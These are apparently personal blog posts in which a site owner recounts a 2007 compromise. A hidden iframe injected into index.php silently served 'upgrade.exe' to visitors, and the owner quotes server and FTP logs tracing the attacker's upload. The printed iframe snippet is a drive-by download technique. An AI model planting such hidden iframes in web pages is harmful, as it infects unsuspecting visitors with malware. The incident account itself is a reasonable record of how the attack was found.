Found this in my error log. Apparently somebody drops nasties in people’s image directories and induce other folks to access the nasty. Fortunately the file doesn’t exist in my image directory. I can’t guess whether it was ever there, or whether the tech guys at laughingsquid removed it for me.
I see from looking online that if it were there, it would download a Bagel variant.
[Mon Jun 09 08:55:14 2008] [error] [client 63.123.82.75] script ‘/var/www/vhosts/bipolarplanet.com/httpdocs/index.php’ not found or unable to stat, referer: http://bipolarplanet.com/images/blst.php
Posted in Anti-Virus, Meta | No Comments »
Sunday
22/18/2007
10:11 pm
Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.
<IFRAME name=’StatPage’
src=’upgrade.exe’ width=5 height=5
style=’display:none’></IFRAME>
Now if you’ll excuse me, I’m going to go boil my laptop.
Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.
Update 11/25:
I am so pwned.
First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.
68.14.90.4 - - [18/Nov/2007:07:23:21 -0800] "GET /~void/tag/t-gondii/upgrade.exe HTTP/1.1" 404 31911 "http://www.bipolarplanet.com/~void/tag/t-gondii/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"
That’s someone who my webpage may have infected. After that the accesses come several times a page.
This is the ftp access where the hacker uploaded the infection and the hacked index.php:
Sun Nov 18 15:12:32 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Sun Nov 18 15:12:51 2007 18 66.246.252.53 543744 /var/www/vhosts/bipolarplanet.com/web_users/void/upgrade.exe b _ i r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 94 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ d r void ftp 0 * c
Sun Nov 18 15:12:51 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ i r void ftp 0 * c
Sun Nov 18 15:42:47 2007 0 66.246.252.53 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php b _ o r void ftp 0 * c
Mon Nov 19 02:46:36 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:50:33 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ o r void ftp 0 * c
Mon Nov 19 02:55:12 2007 0 69.141.48.56 95 /var/www/vhosts/bipolarplanet.com/web_users/void/index.php a _ i r void ftp 0 * c
Mon Nov 19 03:05:05 2007 0 69.141.48.56 185 /var/www/vhosts/bipolarplanet.com/web_users/void/indexhacked.php a _ o r void ftp 0 * c
Mon Nov 19 03:52:48 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ o r void ftp 0 * c
Mon Nov 19 03:52:58 2007 0 69.141.48.56 17 /var/www/vhosts/bipolarplanet.com/web_users/void/ftpchk3.txt a _ d r void ftp 0 * c
66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.
Posted in Geekess, Meta, Software | No Comments »
